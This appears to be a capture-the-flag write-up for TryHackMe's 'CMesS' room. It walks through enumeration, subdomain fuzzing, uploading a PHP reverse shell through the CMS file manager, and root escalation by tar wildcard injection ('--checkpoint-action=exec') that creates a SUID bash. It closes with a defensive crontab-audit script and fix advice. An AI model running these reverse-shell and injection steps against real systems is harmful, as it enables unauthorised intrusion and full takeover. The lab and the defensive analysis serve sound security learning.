CMesS-TRYHACKME
This is a write-up for TryHackMe's room named CMesS.
The room is available here: https://tryhackme.com/room/cmess
This write-up lists the steps that need to be done and is straightforward to follow.
Also note that the IP 10.10.138.197 will be different in your case.
Add an entry in /etc/hosts
==========================
⇒ 10.10.138.197 cmess.thm
Enumeration
===========
⇒ nmap -sC -sV 10.10.138.197
       • 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
       • 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
⇒ Gila CMS on port 80
Dir-busting
===========
⇒ /opt/tools/dirsearch/dirsearch.py -E -x 400,500 -t 100  -u http://10.10.138.197 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
       • Revealed interesting directories like /admin, but no access, and the room says no brute forcing is needed.
Subdomain enumeration using WFUZZ
=================================
HINT: Have you tried fuzzing for subdomains?
⇒ wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm/" -H "Host: FUZZ.cmess.thm" --hl 107
⇒ We got dev.cmess.thm
⇒ Add this in /etc/hosts
       • 10.10.138.197 cmess.thm dev.cmess.thm
⇒ http://dev.cmess.thm/ reveals:
       • User: andre@cmess.thm Password: KP**********
Subdomain enumeration using FFUF
================================
⇒ https://github.com/ffuf/ffuf
Using the “Custom Automatically Calibrate Filtering” feature of FFUF:
⇒ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -acc "www"
       • dev                     [Status: 200, Size: 934, Words: 191, Lines: 31]
⇒ Read more about FFUF Automatically Calibrate Filtering here:- https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html#custom-automatic-calibration-filtering
Another trick is to use FFUF filters:
⇒ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -fl 108
       • dev                     [Status: 200, Size: 934, Words: 191, Lines: 31]
Initial Shell
=============
⇒ Log in to http://10.10.138.197/admin with the above credentials
⇒ Go to http://10.10.138.197/admin/fm
       • Replace the contents of index.php with the PHP reverse shell from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
       • Remember to put in your own IP and port number
       • Also remember to remove the <?php tag, as the file already has one
       • Open a netcat listener on the port you entered earlier
       • Go to http://10.10.138.197/
       • We will get a shell with user www-data on the netcat listener
Privilege Escalation - User
===========================
⇒ Run https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh on target
       • Found an interesting file /opt/.password.bak with user andre's password
       • Found another interesting /etc/crontab entry:
              ◇ */2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
⇒ SSH as user "andre" with the password from the /opt/.password.bak file
⇒ Get the user flag at /home/andre/user.txt
Privilege Escalation - Root
===========================
⇒ Using techniques from this well-known article: https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
   • In the same directory where the backup is made (in the above case, cd /home/andre/backup), do the following:
          ◇ echo "" > "--checkpoint-action=exec=sh shell.sh"
          ◇ echo "" > --checkpoint=1
          ◇ Content of test.sh is:
                 ▪ cp /bin/bash /tmp/bash
                 ▪ chmod +s /tmp/bash
⇒ After the cronjob runs, we will have /tmp/bash with the SUID bit set
⇒ Run /tmp/bash -p to get a root shell and the flag from /root/root.txt
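The root cron job above is the classic pattern the DefenseCode article warns about: a privileged tar run over a bare `*` inside a directory a less-privileged user owns. The following audit script is an added example (not part of this write-up or the room) that checks a system crontab for exactly that pattern, so a defender can spot it before an attacker does. The crontab text and the directory-owner table are constructed sample data modelled on the entry found on the box; on a real host you would read /etc/crontab and use os.stat to get the owner of each working directory.

```python
import re
import shlex
from dataclasses import dataclass

# Constructed sample /etc/crontab, modelled on the entry found in the room.
# Only the */2 job is dangerous: root runs tar over a glob in andre's directory.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
0 3     * * *   root    cd /var/backups && tar -zcf /tmp/etc.tar.gz -- ./etc
0 4     * * *   andre   cd /home/andre/backup && tar -zcf /tmp/mine.tar.gz *
"""

# Constructed ownership table standing in for os.stat(...).st_uid on the real host.
DIR_OWNER = {"/": "root", "/home/andre/backup": "andre", "/var/backups": "root"}


@dataclass
class Finding:
    schedule: str
    user: str        # account the job runs as
    cwd: str         # directory the glob is expanded in
    cwd_owner: str   # who controls the file names tar will see
    command: str


def parse_system_crontab(text):
    """Yield (schedule, user, command) for each job line of a system crontab
    (five schedule fields, then the user field, then the command)."""
    for raw in text.splitlines():
        line = raw.strip()
        # skip blanks, comments and VAR=value environment lines
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        yield " ".join(parts[:5]), parts[5], parts[6]


def tar_glob_unprotected(segment):
    """True if this shell segment runs tar with a bare glob argument that is not
    preceded by '--'. Without '--', a file whose name starts with '--checkpoint'
    is parsed by tar as an option rather than as a file to archive."""
    try:
        argv = shlex.split(segment)
    except ValueError:
        return False
    if not argv or argv[0] not in ("tar", "/bin/tar", "/usr/bin/tar"):
        return False
    for arg in argv[1:]:
        if arg == "--":          # end of options: later names are always files
            return False
        if not arg.startswith("-") and any(ch in arg for ch in "*?["):
            return True
    return False


def audit_crontab(text, dir_owner):
    """Return a Finding for every job that runs tar over an unprotected glob in a
    directory owned by someone other than the job's own user (a privilege boundary)."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        cwd = "/"  # cron jobs start in the user's home; track explicit cd calls
        for segment in re.split(r"&&|\|\||;", command):
            segment = segment.strip()
            m = re.match(r"^cd\s+(\S+)$", segment)
            if m:
                cwd = m.group(1)
                continue
            if tar_glob_unprotected(segment):
                owner = dir_owner.get(cwd, "unknown")  # unknown is treated as untrusted
                if owner != user:
                    findings.append(Finding(schedule, user, cwd, owner, command))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, DIR_OWNER):
        print(f"[{f.schedule}] {f.user} runs tar over a glob in {f.cwd} "
              f"(owned by {f.cwd_owner}): {f.command}")
```

The fix on the cron side is to stop tar from ever seeing attacker-chosen names as options: pass `--` before the file list, name the directory explicitly instead of using `*` (for example `tar -zcf /tmp/andre_backup.tar.gz -C /home/andre backup`), or run the backup as the directory's owner rather than as root. The same walk also catches `rsync` and `chown`-style wildcard jobs if you extend the command list in `tar_glob_unprotected`.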
Thanks for reading. Please let me know in the comments if this works for you too.